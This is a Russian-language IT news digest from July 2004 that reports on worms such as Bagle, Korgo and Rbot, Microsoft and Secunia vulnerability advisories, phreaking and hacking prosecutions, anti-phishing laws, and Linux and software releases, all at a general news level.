Вышел очередной еженедельный отчет от Panda Software. Этот отчет посвящен четырем вредоносным программам: трем червям - Bagle.AF, Atak.A и Korgo.Z, а также троянцу Bagle.AF. Bagle.AF использует свой собственный SMTP для рассылки своих копий по электронной почте, завершает некоторые процессы, такие как антивирусы, и соединяется с различными скриптами PHP. Кроме того, этот червь содержит код, создающий лазейку в виде открытого порта. Второй червь, Atak.A, распространяется по электронной почте в сообщении с изменяющимися параметрами, содержащем вложение с двойным расширением - JPG или GIF и EXE. Atak.A, также как Bagle.AF, ищет электронные адреса в локальных файлах и рассылает свои копии по всем обнаруженным адресам при помощи собственного SMTP механизма. Korgo.Z, использует брешь Windows LSASS. Версия Z Korgo остается резидентной в памяти и пытается загрузить файлы с ряда веб сайтов. Завершается отчет описанием Xebiz.A, троянца, соединяющегося с веб сайтом для загрузки троянца Zerolin.A на поражаемый компьютер. Xebiz.A был массово разослан в сообщениях с изменяющимися характеристиками. Однако все сообщения включают в себя форму с кнопкой. При нажатии пользователем на нее начинается загрузка Zerolin.A.
viruslab.ru

18/07/2004 16:05 Новый выпуск журнала phrack: №62
Содержание:
+ Bypassing 3rd Party Windows Buffer Overflow Protection
+ Kernel-mode backdoors for Windows NT
+ History and Advances in Windows Shellcode
+ Remote Exec: providing the ability to execute a binary on a remote system without creating a file on the disk
+ Writing UTF-8 compatible shellcodes
+ Attacking Apache with builtin Modules in Multihomed Environments
+ The basics of Radio (Radio Hacking)
+ NTIllusion: A portable Win32 userland rootkit
+ Using Process Infection to Bypass Windows Software Firewalls
+ A Dynamic Polyalphabetic Substitution Cipher
+ Introduction for Playing Cards for Smart Profits
Скачать

16/07/2004 19:26 Правительство Южной Кореи финансирует Linux
Правительство Южной Кореи объявило о совоем намерении увеличить финансирование и поддержку отечественных компаний, разрабатывающих ПО для Linux. Министерство Информации и Связи Южной Кореи потратит 26 миллионов долларов США на помощь частным компаниям, занимающихся разработкой ПО для открытой ОС. Планируется также обратить внимание на стандартизацию Linux. Стоит отметить, что ОС Linix была выбрана из-за дешевизы решений на ее основе и в целях повышения безопасности.
compulenta.ru

16/07/2004 19:26 Утилита для удаления вируса Download.Ject от Microsoft
Компания Microsoft выпустила на этой неделе специальную утилиту для удаления нашумевшего вируса Download.Ject. Эта вредоносная программа, напомним, распространяется с зараженных сайтов, работающих под управлением Microsoft Internet Information Server 5, используя дыры в браузере Internet Explorer. Практически сразу после появления вируса Microsoft опубликовала рекомендации по борьбе с ним, а затем во внеочередном порядке выпустила заплатку для Internet Explorer. Впрочем, как быстро выяснили независимые эксперты, патч устраняет далеко не все проблемы - хакеры по-прежнему могут атаковать Internet Explorer, слегка изменив подход к делу. Как рассказал агентству AP менеджер Microsoft по безопаснсоти Стивен Тулуз (Stephen Toulouse), точная дата выхода нового патча пока неизвестна. Однако, тем кто успел подхватить инфекцию поможет выпущенная Microsoft утилита.
www.microsoft.com

16/07/2004 19:25 Еще один Linux-дистрибутив
В прошлом году двумя бывшими программистами Red Hat была основана компания Specifix. В ближайшее время она выпустит альфа-версию своего первого коммерческого продукта - дистрибутива Linux, код которого пользователи смогут менять по своему усмотрению, сохраняя при этом право на техническую поддержку со стороны поставщика. Как правило, производители дистрибутивов Linux осуществляют поддержку своих продуктов только при условии неизменности их кода. Однако в Specifix намерены продолжать оказывать услуги и после внесения модификаций, но только для неизменившихся компонентов ОС. Чтобы это было легче делать, в Specifix создано специальное приложение с открытым кодом Conary, которое представляет собой распределенную систему управления разработкой, позволяющую программистам отслеживать изменения, вносимые в код Linux. Как сообщают в Specifix, Conary позволит "строить, развертывать и контролировать единую кодовую базу Linux на неограниченном количестве конфигураций и аппаратных платформ".
osp.ru

16/07/2004 19:25 SOFT@Mail.Ru организует встречи разработчиков и пользователей
Портал SOFT@Mail.Ru продолжает организовывать встречи разработчиков программного обеспечения с пользователями. Прошлый раз форум посетили разработчики прокси-серверов, а в скором времени пользователи смогут пообщаться с авторами программ для учета интернет-трафика. Адрес форума в интернете soft.mail.ru/pforum. Главными действующими лицами встречи станут российские разработчики программ для учета трафика. Это программы "Интернет Администратор", Internet Connection Counter, CommTraffic, "РусофИТ TrafficFilter". Эти программы разработаны компаниями TamoSoft, "РусофИТ", "Интернет Администратор Компани Лтд." и независимым разработчиком Михаилом Максимовым. Узнать о всех преимуществах и особенностях программ для учета трафика из первых рук все желающие смогут в ходе очередной встречи, которая пройдет 19 июля.
compulenta.ru

16/07/2004 19:24 "Фрикер" предан суду
Американские судебные власти предъявили обвинение жителю города Ист-Честер (шт. Нью-Йорк) Уильяму Квинну во взломе компьютеров, принадлежащих оператору телефонной связи Verizon Communications. Согласно обвинительному заключению, Квинн несанкционированно получил пароли к контрольным устройствам Verizon - компьютерам, используемым техническим персоналом компании для отключения и тестирования абонентских линий, и в период с января по апрель этого года незаконно пользовался системами оператора не менее 100 раз, отключая телефонные номера в различных кодовых зонах США. Обвинители также заявляют, что Квинн размещал пароли доступа к контрольным устройствам Verizon с инструкциями об их использовании на сайтах Web, посвященных "фрикингу" - взлому систем операторов телефонной связи. Как утверждается, Verizon вынуждена была потратить 120 тыс. долл. на восстановление защиты контрольных устройств - изменение их телефонных номеров и выплату персоналу сверхурочных за перепрограммирование паролей доступа. В случае вынесения приговора Квинну грозит до пяти лет тюрьмы и штраф до 250 тыс. долл.
osp.ru

16/07/2004 19:24 Opera меняет лицо
Пользователи Opera, отныне могут, зайдя на сайт компании Opera Software, загрузить пакеты оформления для браузера, делающие его внешне похожим на другие. При установке такого пакета автоматически меняются внешний вид, панели инструментов, меню и клавиши быстрого доступа в соответствии с пользовательским интерфейсом одного из выбранных браузеров: Microsoft Internet Explorer, Apple Safari или Mozilla Firefox.
По информации MacCentral.com, Источник - osp.ru

16/07/2004 19:23 Юных хакеров могут выгнать из Оксфорда
Двум первокурсникам Оксфордского университета, проникшим в компьютерную систему университета и впоследствии опубликовавшим историю своих деяний в студенческой газете, грозит штраф в размере £500 либо исключение. Первокурсники Патрик Фостер (Patrick Foster) и Роджер Уэйт (Roger Waite), взломавшие университетскую компьютерную систему, в свое оправдание утверждают, что намеревались лишь показать узкие места компьютерной системы. Им удалось добраться до материалов, содержащихся во внутренней закрытой сети университета, а также получить доступ к информации об использовании компьютера студентами. Затем они опубликовали рассказ о своем «подвиге» в студенческой газете Oxford Student. В сентябре им предстоит предстать перед университетским судом общей юрисдикции, который может наложить на них штраф и исключить из университета.
cnews.ru

16/07/2004 19:22 Microsoft продолжает преследовать спамеров
Федеральный суд Калифорнии принял положительное решение по иску корпорации Microsoft против американского гражданина. Житель Калифорнии Дэниель Кошнуд (Daniel Khoshnood) и его компания Pointcom Inc. признаны виновными в рассылке спама и нарушении ряда законов, так что они возместят Microsoft ущерб и оплатят судебные издержки, что в совокупности составляет около $4 млн. Кошнуд рассылал предложения скачать некую программу под видом обновления Windows. Пользователей заманивали на сайты hottmail.com, wwwwindows.com, microsoftc.com, wwmsn.com, bcentrals.com и windowsupdatenow.com, откуда и распространялось вредоносное ПО. В прошлом и нынешнем году Microsoft инициировала около 60 судебных процессов против спамеров. К настоящему времени Microsoft выиграла уже более 10 дел на общую сумму около $54 млн.
webplanet.ru

16/07/2004 19:22 Вышла новая версия Google Toolbar
Вышла новая версия Google Toolbar, при помощи которой пользователь может переместиться на нужный сайт, не набирая URL. Чтобы попасть на нужный сайт, достаточно ввести в поисковую строку тулбара название сайта. Тулбар произведет поиск по базе Google, а затем отображает в браузере не результат поиска, а самую релевантную страницу, которая, в большинстве случаев и оказывается искомым результатом. Правда, если поиск — с точки зрения Google — не даст однозначных результатов, пользователь получит все ту же поисковую выборку, изучив которую, он сможет определиться с направлением дальнейшего движения. PC Magazine отмечает, что хоть технология Google Toolbar и похожа внешне на платный сервис от VeriSign — SiteFinder, купить присутствие своего сайта по тому или иному слову в случае с Google нельзя.
webplanet.ru

16/07/2004 19:21 «МТУ-Интел» охотится за студентами
Один из крупнейших московских интернет провайдеров «МТУ-Интел» расширяет свою клиентуру за счет студентов. Именно на эту категорию пользователей расчитано следующее рекламное объявление, которое размещено на сайте компании. Компания «МТУ-Интел» объявляет о проведении новой акции по подключению студентов московских ВУЗов к Интернету. До 31 августа 2004 г. любой студент московского ВУЗа, окончивший летнюю сессию на «хорошо» и «отлично», может бесплатно подключиться к Интернету по специальному тарифу «СТРИМ-Лайт+». Для подключения достаточно предъявить зачетку и документ, удостоверяющий личность в любом из офисов продаж компании «МТУ-Интел».
mtu-intel.ru

15/07/2004 19:56 Дыры в Internet Explorer
На этой неделе, вместе с ежемесячным обновлением, Microsoft выпустила патчи и опубликовала 4 новых уязвимости в Internet Explorer. Уязвимости обнаружили Paul и Georgi Guninski. Поскольку уязвимость связанная с http-equiv допускает создание эксплоита, который в свою очередь может быть использован для атаки на незащищенные системы, секъюрити-компания Secunia оценила эти уязвимости как "чрезвычайно критичные". Уязвимости подтверждены в Microsoft Windows XP SP1 и Internet Explorer 6. Однако, по словам Secunia, могут быть и в более ранних версиях.
secunia.com

15/07/2004 19:42 Red Hat сдает позиции
По данным компании Netctraft, за последние полгода доля систем с Red Hat Linux от общего количества Web-серверов, работающих под управлением Linux, снизилась с 50,8 до 49,8%. Быстрее всего в период с января по июль росло количество инсталляций дистрибутива Gentoo Foundation, правда он же имеет и самую маленькую долю рынка: она увеличилась с 0,7 до 1%, что соответствует примерно 30 тыс. хостам. Доля инсталляций популярного во Франции Mandrake Linux выросла на 15,3%, составив 1,3% рынка в целом. Для SuSE Linux соответствующие показатели - 15,6 и 11,8%, для Debian, который до начала нынешнего года характеризовался самым быстрым ростом, - 14,5 и 15,9%. Как указывают в Netcraft, Red Hat Linux традиционно доминирует в США, а у остальных дистрибутивов наибольшее количество пользователей - в Европе, где в последнее время наблюдается активный рост рынка Web-хостинга, следствием чего, по-видимому, и стало ухудшение позиций Red Hat.
osp.ru

15/07/2004 19:42 Июльские бюллетени безопасности Microsoft
Microsoft выпустила семь бюллетеней безопасности, закрывающих дыры в операционных системах Windows и сопутствующих приложениях. MS04-023 и MS04-022 описывают две критические уязвимости в Task Scheduler и HTML Help. Эти уязвимости позволяют злоумышленнику выполнить произвольный код на машине жертвы. Еще четыре бюллетеня, MS04-019, MS04-020, MS04-021 и MS04-024, охарактеризованы софтверным гигантом как важные. Первый, MS04-019, описывает дыру в ОС Windows 2000. Ошибка связана с неправильной работой приложения Utility Manager и может применяться для поднятия уровня привилегий локального пользователя. Бюллетень MS04-021 закрывает дыры в Microsoft Internet Information Server (IIS) 4.0 операционных систем Windows NT Workstation 4.0 и Windows NT Server 4.0. Из-за ошибки переполнения буфера при обработке постоянных редиректов злоумышленник может выполнить на удаленной машине произвольный код. Наконец, бюллетень MS04-024 описывает дыру в компоненте Windows Shell, посредством которой на ПК жертвы может быть запущена вредоносная программа. Для реализации атаки пользователя необходимо заманить на специально составленный сайт. Последний бюллетень, MS04-018, закрывает уязвимости в почтовых клиентах Outlook Express версий 5.5 и 6.0. Ошибка при проверке заголовков электронных сообщений может использоваться для проведения DoS-атак. Дыра получила рейтинг низкой опасности.
www.microsoft.com

15/07/2004 19:41 SMS-спуфинг - новое оружие в арсенале киберпреступников
По сообщению crime-research.ru, в последнее время участились случаи массовой рассылки SMS-сообщений откровенно угрожающего характера, а также с предложениями, подтвердить какую-либо персональную информацию о владельце мобильного телефона. Ответив на подобные сообщения, абонент предоставляет мошенникам доступ к конфиденциальной информации и становится жертвой постоянных угроз. Эксперты считают, что подобное явление не что иное, как новое направление терроризма XXI века, способное посеять хаос. Это новое направление киберпреступности.
crime-research.ru

15/07/2004 19:41 Новые меры по защите информационных систем в Южной Корее
Правительство Южной Кореи вводит целевую программу, целью которой будет обеспеченение максимальной защиты информационных систем от атак хакеров. Это решение было принято после недавней атаки, вследствие которой были выведены из строя 278 компьютеров в правительственных учреждениях страны. Крупные интернет-провайдеры, такие как KT и Hanaro Telecom должны будут предоставлять отчет о выявленных действиях хакеров. В рамках программы будут созданы 226 специальных групп, которые займутся обеспечением безопасности. С августа начнется активное исследование на предприятиях малой и средней величины, которые не придаются особо тщательного внимания мерам безопасности.
compulenta.ru

15/07/2004 19:40 AOL, Yahoo и MSN заявляют о партнерстве
Корпорации America Online, Microsoft и Yahoo приняли решение сделать совместимыми свои сервисы обмена сообщениями, пишет Washingtonpost.com. Это первый шаг лидеров IT-индустрии на пути к тому, чтобы дать пользователям возможность свободно общаться независимо от того, какую систему они предпочитают. Объявление о партнерской программе, нацеленной на разрушение барьеров между пользователями разных программ, которое должно стимулировать применение сервисов обмена сообщениями на рабочих местах, прозвучало в четверг, 15 июля. Компаниям, заинтересованным в использовании новой системы, необходимо приобрести дополнительный программный продукт производства Microsoft — он будет служить узлом, объединяющим сервисы AOL, Microsoft MSN и Yahoo в один. Однако пока компании, объявившие о сотрудничестве, не планируют предоставлять преимущество взаимной совместимости сервисов интернет-пользователям, когда те не находятся на своих рабочих местах. Корпорация AOL, лидирующая по популярности у юзеров благодаря AIM и ICQ не заинтересована в том, чтобы делать свою систему открытой для клиентов Microsoft и Yahoo в любой момент времени, рискуя при этом потерять значительную долю на рынке. Однако представители Microsoft и Yahoo выразили надежду на то, что данное партнерство — лишь начало, за которым последует углубление сотрудничества.
webplanet.ru

15/07/2004 19:40 Пиратские и лицензионные диски подешевели
Информационно-аналитический отдел Гильдии по развитию аудио-видео торговли (ГРАВТ) подвел итоги очередного мониторинга торговых точек Москвы, реализующих аудио- и видео-кассеты, DVD-диски и компьютерные информационные носители. Эксперты отмечают увеличение доли лицензионной продукции в тех местах, где продают и пиратские, и «легальные» DVD; в то же время, снизилось количество торговых точек, где контрафактная продукция не представлена вообще. Обе тенденции объясняются снижением цен – как на лицензионные, так и на пиратские фильмы; антипиратские рейды, проводимые госструктурами, не оказали существенного влияния на соотношение контрафактной и легальной продукции на рынке Москвы, утверждают специалисты ГРАВТ. Особенностью последнего мониторинга стало то, что он совпал по времени с крупномасштабными и результативными акциями государственных структур по уничтожению производственных мощностей, на которых производились пиратские DVD-диски. Задачей ГРАВТ было выяснить, насколько осложнилась жизнь розничных торговцев контрафактными дисками после того, как они лишились крупных поставщиков. По уверению продавцов (это совпало и с наблюдениями исследователей ГРАВТ), дефицит испытывался лишь в первый день после антипиратских рейдов. К концу второго дня поставки контрафактных дисков фактически возвратились на прежний уровень. Итоги следующего (5-го по счету в этом году) мониторинга ГРАВТ будут подведены в конце июля.
cnews.ru

15/07/2004 19:39 Вышла бета-версия Panda WebAdmin Antivirus
Panda Software запустила бета версию нового продукта Panda WebAdmin Antivirus. Этот продукт предназначен для защиты информационной инфраструктуры предприятий малого и среднего бизнеса от атак всех типов вирусов, червей и троянцев. Бета-версия Panda WebAdmin Antivirus доступна для бесплатного пробного использования на сайте Panda Software. Panda WebAdmin Antivirus защищает электронную почту (SMTP, POP3 и NNTP, вместе с клиентом Exchange) и файлы всех компьютеров и файловых серверов Windows в корпоративной сети, включая файлы, находящиеся на компьютерах, не имеющих подключения к интернету или компьютеры, находящиеся за пределами локальной сети, например, портативные компьютеры и компьютеры, используемые в локальных офисах, независимо от того, где они расположены. Для этого он использует две новые технологии: Distributed Server Proxy и Distributed Server File Sharing.
viruslab.ru

15/07/2004 19:39 Что волнует хакеров сегодня
«Революция сейчас!», «Следи за следящими!», «Взломаем выборы-2004!» — под такими лозунгами прошло пятое ежегодное собрание «Хакеры на планете Земля» (сокращенно — HOPE, т.е. «надежда»).НОРЕ 5 была организована с 9 по 11 июля ведущим хакерским журналом 2600. Множество политических лозунгов стали лишь фоном для серьезных технических дискуссий, в которых приняли участие лучшие специалисты из Европы, Америки и Азии. Темы обсуждений были очень и очень любопытны и разнообразны. Несколько докладов на HOPE 5 было посвящено природе спама, сущности спам-ботов, спам-троянов, а также «самым подлым методам рассылки спама». Хакеры обсудили наиболее эффективные способы борьбы с «заразой 21-го века».
webplanet.ru

15/07/2004 19:38 Библиотеки подают в суд на «КМ онлайн»
После недавних нашумевших исков, онлайн-библиотеки решили взять реванш у своих оппонентов. Как сообщает «Веб-информ», Андрей Миронов, представляющий интересы онлайн-книгохранилищ, намерен инициировать ряд встречных исков против компании «КМ онлайн». Андрей Миронов также сообщил, что ряд исковых заявлений планируется подать от имени тех авторов литературных произведений, которые не давали разрешения на публикацию своих текстов на сайте Lib.km.ru. Вторая группа исков будет опираться на закон о защите прав потребителей. По мнению г-на Миронова, есть основания предполагать, что за «КМ онлайн» может быть признана ответственной в нарушении этого закона. В жалобах третьей группы речь пойдет «о защите чести и достоинства». Марина Бунина, юрист «КМ онлайн», считает позиции своих оппонентов слабыми. И в то же время призывает их пойти «на мировую».
webplanet.ru

15/07/2004 14:10 Американский Сенат собирается бороться с интернет-аферистами
Мошенники, создающие фальшивые веб-сайты с целью получения идентификационных данных интернет-пользователей, могут попасть в тюрьму на срок до пяти лет. Таковы положения законопроекта, поступившего на рассмотрение в американский Сенат, сообщает ComputerWorld. Проект "Закона об антифишинге" (The Anti-Phishing Act of 2004), представленный 9 июля сенатором Патриком Лихи (Patrick Leahy) квалифицирует интернет-мошенничество как федеральное преступление. Создание фальшивого сайта с целью получения идентификационных данных гражданина и передачи их посторонним лицам теперь будет нарушением закона. Законопроект также запрещает регистрировать интернет-адреса, похожие на адреса легитимных бизнес-структур и получать от их имени персональные сведения пользователей. Афера под названием "фишинг" (или "рыбалка") предусматривает отправку пользователям писем от имени коммерческих структур, например, банков. Авторы посланий просят адресатов сообщить данные, позволяющие получать доступ к банковским счетам (PIN-коды и номера банковских карт). Подобные аферы ежегодно оборачиваются для американских потребителей и продавцов потерями в размере около 2 миллиардов долларов. "Только представьте себе, как бы мы озаботились, если бы такую сумму украли во время ограбления банка. В долгосрочной перспективе такое мошенничество подрывает сам интернет. Если вы не можете доверять никому во время работы в интернете, вряд ли вы будете его использовать для коммерческих операций и отношений", - отметили в Сенате. В то же время законопроект Лихи не квалифицирует как преступление создание пародийных веб-сайтов. Действующие американские законы позволяют привлекать мошенников к ответственности, но только в том случае, если "фишинг" обернулся для кого-то реальными финансовыми потерями. После утверждения законопроекта Лихи мошенников можно будет привлекать к суду даже в том случае, если на их уловку никто не клюнет. "Это нарастающая проблема. Фишинг на подъеме. Первые аферы подобного рода проводили новички. Сейчас есть свидетельства того, что за некоторыми аферами стоит организованная преступность", -прокомментировал свой законопроект Лихи.
viruslist.ru

14/07/2004 16:45 Вышла финальная версия PHP 5.0
Сообщается о выходе новой финальной версии скриптового языка PHP. В PHP версии 5.0 появилось множество нововведений, главным из которых, пожалуй, является новая объектная модель. Среди новшеств числятся закрытые и защищенные атрибуты классов, абстрактные классы, интерфейсы, ключевое слово "final", обозначающее, как и в Java, что наследуемые классы не могут переопределять свойства и методы, объявленные с его использованием. Стало возможно создание конструкторов, деструкторов и методов, осуществляющих клонирование объектов. Среди прочих новых возможностей PHP5 имеются переработанная поддержка XML (в том числе модуль SimpleXML), встроенная поддержка SOAP, а также новые средства для работы с базами данных SQLite и MySQLi (объектно-ориентированный интерфейс для баз данных MySQL) и многое другое.
http://www.php.net/

14/07/2004 15:16 Выпущен дистрибутив Fedora Core 3 Test 1
Вышла в свет первая тестовая версия Fedora Сore 3. Дистрибутив уже доступен для скачивания в виде rpm-пакетов и iso-образов. В новую версию вошел последний релиз ядра Linux - 2.6.7, компилятор GCC версии 3.4, графические среды Gnome 2.8 и KDE 3.3 и почтовый клиент Ximian Evolution 2.0. Очень многие включенные в дистрибутив пакеты, включая Gnome и KDE, пока находятся на стадии бета-версий, так что пока они не достигнут статуса релиза, ждать выхода окончательной версии Fedora Core 3 не стоит.
developers.slashdot.org

14/07/2004 15:14 Обнаружена уязвимость в пакете Adobe Acrobat Reader
Компания iDefense сообщает о наличии уязвимости в пакете Adobe Acrobat Reader. Дыра, теоретически, предоставляет злоумышленникам возможность выполнить на удаленном компьютере произвольный вредоносный код. Для реализации атаки необходимо заставить жертву открыть файл в формате PDF со сформированным особым образом именем, содержащим чрезмерно длинное расширение. Уязвимость, представляющая умеренную опасность, присутствует в пакете Acrobat Reader версии 6.0.1. Устранить опасность можно путем инсталляции обновленной версии программы с индексом 6.0.2.
compulenta.ru, idefense.com
Рекомендации Adobe

14/07/2004 15:12 Обнаружен новый сетевой червь Rbot
Компания Sophos обнаружила новую вредоносную программу, получившую название Rbot. Этот червь поражает слабо защищенные компьютерные сети с простыми паролями. После проникновения на машину-жертву вирус вносит дополнительные ключи в реестр, обеспечивая себе, тем самым, автоматический запуск при старте операционной системы Microsoft Windows. Кроме того, Rbot пытается завершить ряд процессов, например, regedit.exe и netstat.exe, а также открывает "черный ход" в систему, принимая команды от автора через IRC-каналы. Широкого распространения вредоносная программа пока не получила.
compulenta.ru, sophos.com

14/07/2004 15:05 Совет Федерации: регулировать интернет можно и нужно
Вчера, 13 июля 2004 года, состоялось заседание рабочей группы при Комиссии Совета Федерации по информационной политике по законодательству, регламентирующему развитие сети интернет в России. Основной темой заседания стало постулирование необходимости цивилизованного регулирования развития Рунета. Консультации по вопросу разработки пакета документов, регламентирующих функционирование и развитие Рунета, начались несколько месяцев. Рабочая группа при Комиссии Совета Федерации по информационной политике была создана в начале мая этого года, в неё вошли представители органов власти, ИТ-индустрии, общественных организаций. Одним из наиболее злободневных вопросов в области разработки нормативных документов по регулированию интернета, является вопрос борьбы со спамом. Координатор рабочей группы Проекта «АнтиСпам» Евгений Альтовский напомнил о ситуации вокруг внесенного в Госдуму законопроекта, целью которого заявлена борьба со спамом. По мнению г-на Альтовского, «существует ряд злободневных проблем, которые хочется решить как можно скорее. Однако, рассмотрение этих проблем вне контекста, попытка найти частное решение, не имея общей концепции, зачастую приводит к плачевным результатам, как в случае с упомянутым законопроектом, который, вопреки заявленной цели, не запрещает, а, наоборот, узаконивает спам». Как отметили в Российском комитете Программы ЮНЕСКО «Информация для всех», заседание рабочей группы прошло в духе конструктивного диалога. Принципиальных разногласий между позициями присутствующих не было. Участники заседания внесли ряд предложений по содержанию итогового документа встречи, который станет планом дальнейших действий рабочей группы. Кроме того, по предложению сенатора Людмилы Нарусовой, было решено подготовить запрос в официальные инстанции относительно возможности применения Статьи 273 Уголовного кодекса РФ в отношении распространителей спама.
cnews.ru

14/07/2004 15:05 Компьютерное пиратство: статистика преступлений
Центр исследования компьютерной преступности (crime-research.ru) опубликовал статистику приступлений связанных с компьютерным пиратством в Харьковской области за последние годы. Однако эта статистика позволяет оценить масштабы и рост преступности не только в данном регионе или на Украине, но и в странах бывшего СНГ вцелом. По данным Управления информационных технологий при УМВД Украины в Харьковской области доли зарегистрированных преступлений по ст. ст. 176, 362, 363 УК за период с 2001 г. по апрель 2004 г. составили: 2001г. - 6%; 2002г. - 36%; 2003г. - 45%; 1 квартал 2004г. - 13%. Причем, более четверти этих преступлений, так или иначе, связаны с нарушением авторского права на компьютерные программы. В марте 2003 г. правоохранительными органами было направлено в суд уголовное дело по факту совершения преступления, предусмотренного п.2 ст.176 УК (реализация компакт-дисков с контрфактной продукцией), сумма установленных материальных убытков от которого составила почти 200 тыс. грн. Уже одна эта сумма в масштабах региона говорит о размахе компьютерного пиратства в стране. Причем граждане, обвиненные в такого рода преступлениях, являются, как правило, ранее не судимыми и не связанными с «криминалом» в привычном его понимании; большинство из них не достигли 30-летнего возраста, имеют высшее образование.
crime-research.ru

14/07/2004 15:04 Symantec совершенствует антиспамерскую защиту
Производитель антивирусного программного обеспечения компания Symantec приобрела за 28 млн долларов фирму TurnTide. Таким образом Symantec намеревается расширить свое присутствие на рынке антиспамерских программ, сообщает News.com. Публичного заявления о слиянии Symantec и TurnTide пока не было. Информация о сделке сначала появилась на сайте TurnTide. Позже ее подтвердили в Symantec и пояснили, что полностью процесс приобретения TurnTide завершится в четверг. «Мы занимаемся поиском решения, которое защитит корпоративные сети от разных угроз», - пояснила покупку TurnTide пресс-секретарь Symantec Линда Смит Муньян. Технология TurnTide станет элементом многослойной антиспамерской защиты наряду с Brightmail и другими разработками Symantec. Компанию Brightmail Symantec приобрела два месяца назад. Сделка по приобретению TurnTide подчеркивает важность технологий, способных пресекать распространение спама на стадии его прохождения через маршрутизаторы. TurnTide предлагает антиспамовый маршрутизатор, который представляет собой специальное аппаратное и программное обеспечение. Эта разработка обрабатывает пакеты информации и отсеивает те из них, которые приходят от спамеров.
viruslist.ru

14/07/2004 15:04 Хакеры атакуют сервера правительства Южной Кореи
Хакеры, базирующиеся в Китае атаковали сервера южнокорейского правительства сразу двумя видами вирусов, сообщает Reuters. Как сообщает National Intelligence Agency (NIS), атака ведется при помощи вирусов Peep Trojan и Backdoor Revacc. Ими заражено уже более 270 компьютеров, атака продолжает набирать обороты. Атаке подверглись не менее 10 государственных организаций, в том числе National Assembly, Korea Atomic Energy Research Institute м National Maritime Police Agency. Хакеры уже выкрали более 120 паролей к почтовым аккаунтам, принадлежащим государственным служащим и политикам. Корейские власти планирую обратиться к Китаю с просьбой помочь в расследовании инцидента.
webplanet.ru

13/07/2004 16:39 Обнаружена дыра в MSN Messenger и Microsoft Word
В пакетах MSN Messenger и Microsoft Word обнаружена опасная уязвимость. Как сообщает датская компания Secunia, посредством дыры злоумышленники могут получить доступ к оболочке операционной системе (shell) и запустить на удаленном компьютере программы, ассоциированные с определенными расширениями. Уязвимость не позволяет передавать параметры этим приложениям, что ограничивает возможности атакующих. Ошибка присутствует в пакетах MSN Messenger 6.x и Microsoft Word 2002. Специалисты Secunia рекомендуют пользователям вышеназванных программ воздержаться от перехода по неизвестным гиперссылкам.
Источник, Advisory

13/07/2004 16:37 Windows ХР SP2 выйдет в августе
Окончательная версия второго сервис-пака (Service Pack 2) для флагманской операционной системы Microsoft Windows ХР выйдет в августе нынешнего года, то есть на два месяца позднее ранее запланированной даты. Об этом сообщает Reuters со ссылкой на заявления Майка Нэша, руководителя подразделения Microsoft, занимающегося вопросами безопасности.Ожидается, что второй пакет обновлений будет доступен для загрузки через интернет и на компакт-дисках. Сервис-пак для ОС Windows XP Home Edition займет около 70 Мб, для Windows XP Professional - порядка 92 Мб. Пользователи лицензионных версий операционной системы смогут получить SP2 бесплатно, а вот на компьютеры с пиратскими Windows XP апдейт устанавливаться, вероятнее всего, не будет. Согласно имеющейся в настоящее время информации, сервис-пак перед инсталляцией будет проверять идентификационный номер ОС, и если последний совпадет с одним из номеров, занесенных в "черный список", установка будет прервана. Кстати, такая же система защиты была реализована и в первом сервис-паке для Windows XP. Следует напомнить, что одной из главных целей, которую преследовали программисты при разработке второго пакета обновления для Windows XP, являлось повышение уровня безопасности. В частности, Microsoft усовершенствовала встроенный брандмауэр, внесла изменения в браузер Internet Explorer и почтовый клиент Outlook Express, а также улучшила управление памятью.
compulenta.ru

13/07/2004 16:37 Уязвимость в Microsoft Word и Outlook
Специалисты компании Secunia предупреждают о наличии опасной уязвимости в пакетах Microsoft Word и Outlook, используя которую злоумышленники могут выполнить в удаленной системе произвольный вредоносный код. Ошибка проявляется только в том случае, если владелец компьютера использует Word для редактирования электронных писем в Outlook. Для реализации атаки необходимо заставить жертву переслать составленное определенным образом сообщение, содержащее незакрытый тэг OBJECT. Кроме того, уязвимость может быть задействована, если пользователь редактирует вредоносный HTML-документ при помощи пакета Word. Дыра присутствует в приложениях Microsoft Word 2000, Microsoft Outlook 2003, Microsoft Outlook 2000, Microsoft Works Suite 2003, Microsoft Office 2000 и Microsoft Office 2003.
Источник, Advisory

13/07/2004 16:36 Magix и Panda Software объединились против вирусов
Panda Software и Magix сформировали стратегический международный альянс, который позволит клиентам немецкого разработчика и распространителя персональных мультимедийных программ по всему миру получить доступ к ресурсу для защиты компьютеров от возрастающей угрозы вирусов и вторжений. Для защиты пользователей от вирусов и вторжений Panda Software и Magix проведут ряд акций в следующие месяцы. Magix также добавит антивирусный канал на своем сайте, включающий новости о последних обнаруженных вредоносных кодах и ежеминутно обновляемые данные о более чем 70 000 существующих вирусов.
webplanet.ru

13/07/2004 16:35 Китайские хакеры открыто продают вирусы в интернете
Китайские хакеры предлагают всем желающим изготовить на заказ вредоносную программу. Предложения об изготовлении компьютерных вирусов за 12-14 долларов размещены на одном из общедоступных веб-сайтов, сообщает агентство «Интерфакс» со ссылкой на китайского производителя антивирусов - компанию Rising.По словам пресс-секретаря Rising Лу Ланя, хакеры предлагают не вновь созданные вирусы, а модифицированные версии старых вредоносных программ. Желающие приобрести на заказ вирус могут обращаться к продавцам через одну из интернет-служб обмена текстовыми сообщениями.«Услуги, предлагаемые на этом сайте, для Китая не новость. Однако прежде нам никогда не доводилось видеть, чтобы кто-то рекламировал продажу вирусных программ так открыто», - пояснил Лу Лань.Обнаружив сайт по продаже вирусов, компания Rising немедленно сообщила о нем в Министерство национальной безопасности Китая. Сотрудники этого ведомства уже начали расследование по факту работы сайта, на котором можно найти предложения купить вирусы. Установить URL вирусного сайта «Интерфаксу» не удалось, поскольку Министерство общественной безопасности держит его в строгом секрете.
viruslist.ru

12/07/2004 21:26 Червь Hobot маскируется под флэш-анимацию
Специалисты компании Sophos обнаружили новую вредоносную программу, получившую название Hobot. Этот малоопасный червь распространяется на дискетах, маскируясь под анимацию Macromedia Flash. После запуска файла пользователем компьютера вирус записывает собственные копии в системный и временный каталоги Windows под именами Wins.dll.exe, SystemInfo.exe, WinMessing.exe и Ctfmon.exe. Кроме того, файл Recycled.exe помещается в директорию C:\recycled. Далее червь вносит изменения в реестр с целью обеспечения своего автоматического запуска при каждом старте ОС. Вредоносная программа запрограммирована только на размножение и других действий не выполняет.
compulenta.ru

12/07/2004 21:26 Обнаружена новая версия червя Korgo
